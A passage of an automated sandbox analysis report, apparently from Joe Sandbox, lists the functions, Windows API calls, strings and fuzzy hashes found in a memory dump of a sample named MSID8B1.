                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: 8a199f06257f3e5f6e137fb373868bad3103f0fcf89a01ac928e4326d2ea7154
                                                                  • Instruction ID: f77e06773f1acff27c45ae3431cd42f21af32478f094bec19d6518022aef0992
                                                                  • Opcode Fuzzy Hash: 8a199f06257f3e5f6e137fb373868bad3103f0fcf89a01ac928e4326d2ea7154
                                                                  • Instruction Fuzzy Hash: 7E419134E00209ABCF10DF68C881A9EBBF5FF45718F188199E9189B392CB759F15DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,00B57408,00B53841,0000000C,?,00000000,00000000,?,00B57632,00000021,FlsSetValue,00B6BD58,00B6BD60,?), ref: 00B573BC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3664257935-537541572
                                                                  • Opcode ID: 11d066c106a82ac3dcd973c82b65421e476c88718b4a8f27aac452aae0155d51
                                                                  • Instruction ID: 361af390cee88585a81d30f6e83cc1747f5172231d883f218d2f9e77405cbbca
                                                                  • Opcode Fuzzy Hash: 11d066c106a82ac3dcd973c82b65421e476c88718b4a8f27aac452aae0155d51
                                                                  • Instruction Fuzzy Hash: 5C21D131B89211ABCB219B64AC45B6E37E8DF42771B2401E0ED15E7290EF74EE05D6A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B531
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B54F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B577
                                                                  • LocalAlloc.KERNEL32(00000040,0000000C,00000000,823FDEC6,?,00000000,00000000), ref: 00B2B5CF
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B6B7
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B6E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                  • String ID:
                                                                  • API String ID: 3931714976-0
                                                                  • Opcode ID: ca41067b2a2000b837ae9ae879f2c26b2cc8798dcb464adb434d9f27111c6912
                                                                  • Instruction ID: 55b9439108d161362b19aa4f6adf44f6c1013e8f9f6d3c4dc80a3f56373f5df1
                                                                  • Opcode Fuzzy Hash: ca41067b2a2000b837ae9ae879f2c26b2cc8798dcb464adb434d9f27111c6912
                                                                  • Instruction Fuzzy Hash: 1A51AD71900218DFDB12DF58D890BAEBBF4FF14314F244599E819AB391DBB5EA44CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B731
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B74F
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B777
                                                                  • LocalAlloc.KERNEL32(00000040,00000008,00000000,823FDEC6,?,00000000,00000000), ref: 00B2B7CF
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B863
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B88D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                  • String ID:
                                                                  • API String ID: 3931714976-0
                                                                  • Opcode ID: 83d5a42d46c4583e28aee5b1f930c549a4262e2a22ad6edf4b14adf64f815f57
                                                                  • Instruction ID: f969b5ac99498780fbd7beb82dbab4cb84e6be87fe45c2be34c1387336848ab0
                                                                  • Opcode Fuzzy Hash: 83d5a42d46c4583e28aee5b1f930c549a4262e2a22ad6edf4b14adf64f815f57
                                                                  • Instruction Fuzzy Hash: A6517D71904224DFCB11DF98D890B9EBBF4EF14314F24859DE859AB391DB74AE40CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16
                                                                  • String ID: a/p$am/pm
                                                                  • API String ID: 3509577899-3206640213
                                                                  • Opcode ID: f72d6361ab92ba1f84eb0b8cf1bc9fd54d96fca18bdff96eff69dd3551eb4ee6
                                                                  • Instruction ID: 60d9783723c7f1c034eb423267239d13aef0b88a3a87d3a505bc85dff9a7d0f4
                                                                  • Opcode Fuzzy Hash: f72d6361ab92ba1f84eb0b8cf1bc9fd54d96fca18bdff96eff69dd3551eb4ee6
                                                                  • Instruction Fuzzy Hash: A2C1DE35920206DBDB24AF68C989BBA77F0FF59302F2440C9ED05AB250D331AD49DFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00B4596F,00B44900,00B4358F), ref: 00B45986
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B45994
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B459AD
                                                                  • SetLastError.KERNEL32(00000000,00B4596F,00B44900,00B4358F), ref: 00B459FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 62710e7365c2ec2ad963f3a0fced625f1d5c586e5dd3d659564c1d1533990b81
                                                                  • Instruction ID: fa8a6e134ddabce38a7203875b150ad04ee3e7ddd64c7d2469df7fe7c04c8a99
                                                                  • Opcode Fuzzy Hash: 62710e7365c2ec2ad963f3a0fced625f1d5c586e5dd3d659564c1d1533990b81
                                                                  • Instruction Fuzzy Hash: 41018433209F12EFE63426B47C86E6A2BD4EB0277A72003ADF518961E2FE514D81B1D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetTempFileNameW.KERNEL32(?,URL,00000000,?,823FDEC6,?,00000004), ref: 00B23294
                                                                  • MoveFileW.KERNEL32(?,00000000), ref: 00B2354A
                                                                  • DeleteFileW.KERNEL32(?), ref: 00B23592
                                                                    • Part of subcall function 00B21A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00B21AF7
                                                                    • Part of subcall function 00B21A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00B21B7D
                                                                    • Part of subcall function 00B22E60: LocalFree.KERNEL32(?,823FDEC6,?,?,00B63C40,000000FF,?,00B21242,823FDEC6,?,?,00B63C75,000000FF), ref: 00B22EB1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                  • String ID: URL$url
                                                                  • API String ID: 853893950-346267919
                                                                  • Opcode ID: d97b07fca1b428d73e6fe29375fcbbf71363414eb69e1c56edb7cf2293bc4dc0
                                                                  • Instruction ID: af282e79734e8d90b206419295cbeaf7c672c775be214548d6abf1eeb73b597d
                                                                  • Opcode Fuzzy Hash: d97b07fca1b428d73e6fe29375fcbbf71363414eb69e1c56edb7cf2293bc4dc0
                                                                  • Instruction Fuzzy Hash: 66C135709142689ADB24DF28DC987EDBBF4BF14704F1042D9D00DA7291EBB96B88CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00B23735
                                                                  • GetLastError.KERNEL32(?,?,?,00B64215,000000FF), ref: 00B2381A
                                                                    • Part of subcall function 00B22310: GetProcessHeap.KERNEL32 ref: 00B22365
                                                                    • Part of subcall function 00B246F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00B23778,-00000010,?,?,?,00B64215,000000FF), ref: 00B24736
                                                                  • _wcschr.LIBVCRUNTIME ref: 00B237C6
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00B64215,000000FF), ref: 00B237DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                  • String ID: ntdll.dll
                                                                  • API String ID: 3941625479-2227199552
                                                                  • Opcode ID: f9c7209e93886215fa4cd186fb3ab55c6eecbf0a380d91dfd518052ed5ef954b
                                                                  • Instruction ID: d15adb4d459ffe4208dc5f2b54f0c2815077d127de59afb86309d6a1c4709295
                                                                  • Opcode Fuzzy Hash: f9c7209e93886215fa4cd186fb3ab55c6eecbf0a380d91dfd518052ed5ef954b
                                                                  • Instruction Fuzzy Hash: A941D2716006159FDB10DF68DC45BAEB7E4FF14710F1446A9E92A9B2D0EBB49B04CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00B21A20: LocalFree.KERNEL32(?), ref: 00B21A42
                                                                    • Part of subcall function 00B43E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B21434,?,?,00B2D341,00B21434,00B78B5C,?,00B21434,?,00000000), ref: 00B43EBA
                                                                  • GetCurrentProcess.KERNEL32(823FDEC6,823FDEC6,?,?,00000000,00B64981,000000FF), ref: 00B262EB
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B262B0
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B262B7
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 1333104975-3789238822
                                                                  • Opcode ID: 3b93dfe62091420afa444fce3e45fc74e49e487faae37883a147333fac781f84
                                                                  • Instruction ID: 9ce05376e069c80a424cdfe97b2dbe615168039a6ae28565b0f308f050b35289
                                                                  • Opcode Fuzzy Hash: 3b93dfe62091420afa444fce3e45fc74e49e487faae37883a147333fac781f84
                                                                  • Instruction Fuzzy Hash: 2521C371D45615DFDB10DF94ED06B5D77F8EB18B10F2006A9F829A32E0DF7499008A61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                  • String ID: $+xv
                                                                  • API String ID: 2204710431-1686923651
                                                                  • Opcode ID: b1129f91ea126eeb554a3c36a1acc78a5c8196c1dbdbaa4ebbefd35c09dcf15d
                                                                  • Instruction ID: d3163adeb05508111cb5c556a5a824516c51055c4df1e9511c41312ca8914a91
                                                                  • Opcode Fuzzy Hash: b1129f91ea126eeb554a3c36a1acc78a5c8196c1dbdbaa4ebbefd35c09dcf15d
                                                                  • Instruction Fuzzy Hash: 0621D6B1804B926EDB21DF74C89073BBEF8AB08300F144A9AF499C7A42D774E601CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(823FDEC6,823FDEC6,?,?,00000000,00B64981,000000FF), ref: 00B262EB
                                                                    • Part of subcall function 00B42C98: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CA3
                                                                    • Part of subcall function 00B42C98: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,?,00B223B6,00B7E638,823FDEC6,?,?,00B63D6D,000000FF), ref: 00B42CE0
                                                                  • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B262B0
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00B262B7
                                                                    • Part of subcall function 00B42C4E: EnterCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C58
                                                                    • Part of subcall function 00B42C4E: LeaveCriticalSection.KERNEL32(00B7DD3C,?,?,00B22427,00B7E638,00B66B40), ref: 00B42C8B
                                                                    • Part of subcall function 00B42C4E: RtlWakeAllConditionVariable.NTDLL ref: 00B42D02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                  • String ID: IsWow64Process$kernel32
                                                                  • API String ID: 2056477612-3789238822
                                                                  • Opcode ID: f8db9dd94ea304bd2a2617b046a0167fe5bc93865544779a5f43d254f31bd0d5
                                                                  • Instruction ID: 3e4603376a1073161ca0e48e6ee08dc1f96679e511db0d77662082607b980ee4
                                                                  • Opcode Fuzzy Hash: f8db9dd94ea304bd2a2617b046a0167fe5bc93865544779a5f43d254f31bd0d5
                                                                  • Instruction Fuzzy Hash: 7111A2B2D48614DFDB10CF94ED45B99B7F8FB18B10F2006AAE829936D0EB75A900CA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00B46AA3,?,?,00B7DDCC,00000000,?,00B46BCE,00000004,InitializeCriticalSectionEx,00B697E8,InitializeCriticalSectionEx,00000000), ref: 00B46A72
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3664257935-2084034818
                                                                  • Opcode ID: b3618b4c3fa86e55df07252a4ce2d793281682683236c54c7b4b2b1ba6d15781
                                                                  • Instruction ID: 1db86c2b66c27d815d1036fc47b0967c44ab4e7ce38180e291399f1147bff880
                                                                  • Opcode Fuzzy Hash: b3618b4c3fa86e55df07252a4ce2d793281682683236c54c7b4b2b1ba6d15781
                                                                  • Instruction Fuzzy Hash: F9119131A45A25ABDF228B689C41B5933E8DF13760F1442A0F954BB2C0DBB4EF009AD6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,823FDEC6,?,?,00000000,00B66A6C,000000FF,?,00B52DC1,?,?,00B52D95,?), ref: 00B52E23
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B52E35
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00B66A6C,000000FF,?,00B52DC1,?,?,00B52D95,?), ref: 00B52E57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 4a0066416508306c813363476425db9a6c3bd44e60b474c11e38b04f4c129ca4
                                                                  • Instruction ID: d7aba78acce08c2763b1302594dcf741cf7a334c6cbc0cbe232b121011e67c6c
                                                                  • Opcode Fuzzy Hash: 4a0066416508306c813363476425db9a6c3bd44e60b474c11e38b04f4c129ca4
                                                                  • Instruction Fuzzy Hash: 2A016771958619ABDB129F50DC05FAEBBF8FB05B15F044565F811F32E0DFB89900CA90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __alloca_probe_16.LIBCMT ref: 00B56E40
                                                                  • __alloca_probe_16.LIBCMT ref: 00B56F01
                                                                  • __freea.LIBCMT ref: 00B56F68
                                                                    • Part of subcall function 00B55BDC: RtlAllocateHeap.NTDLL(00000000,00000000,00B53841,?,00B5543A,?,00000000,?,00B46CE7,00000000,00B53841,00000000,?,?,?,00B5363B), ref: 00B55C0E
                                                                  • __freea.LIBCMT ref: 00B56F7D
                                                                  • __freea.LIBCMT ref: 00B56F8D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1423051803-0
                                                                  • Opcode ID: 3cdfa793047a447d4291b4b64d2f15a31aaf0739be61511a43870f0c4b943274
                                                                  • Instruction ID: 9d6d42fa8920ca65a41f24abae2aa6b632ce684ffec4bd2cd3cd895dabba42a3
                                                                  • Opcode Fuzzy Hash: 3cdfa793047a447d4291b4b64d2f15a31aaf0739be61511a43870f0c4b943274
                                                                  • Instruction Fuzzy Hash: 8D51AE72A00206AFEB259FA4DC82FBF3BE9EB04752B5501E8BC04D7150EB71CD189660
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B8DD
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B2B900
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B928
                                                                  • std::_Facet_Register.LIBCPMT ref: 00B2B98D
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00B2B9B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                  • String ID:
                                                                  • API String ID: 459529453-0
                                                                  • Opcode ID: 63834b17ba7b674a75bbd0d8517118fb3e2f01c79040e739dd1b807bee3ac719
                                                                  • Instruction ID: 30fd641cbfb94ab9addbb5d7215daf944223535f4672936454daaa41776043c1
                                                                  • Opcode Fuzzy Hash: 63834b17ba7b674a75bbd0d8517118fb3e2f01c79040e739dd1b807bee3ac719
                                                                  • Instruction Fuzzy Hash: 5A31D231900228DFCB11DF58E951BADBBF4EF24724F2441D9E918672A1DB30AE81CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,?,75474450,00B25646,?,?,?,?,?), ref: 00B25898
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                  • API String ID: 1452528299-1782174991
                                                                  • Opcode ID: 3102418f99e2691af494b26f39ef21dd54e5e6294cf06d9d24451329acccbc79
                                                                  • Instruction ID: 818b449e7a08e7ee93e77d217f3f0913a9c461cc1d6c8be896196dc6edf81ad9
                                                                  • Opcode Fuzzy Hash: 3102418f99e2691af494b26f39ef21dd54e5e6294cf06d9d24451329acccbc79
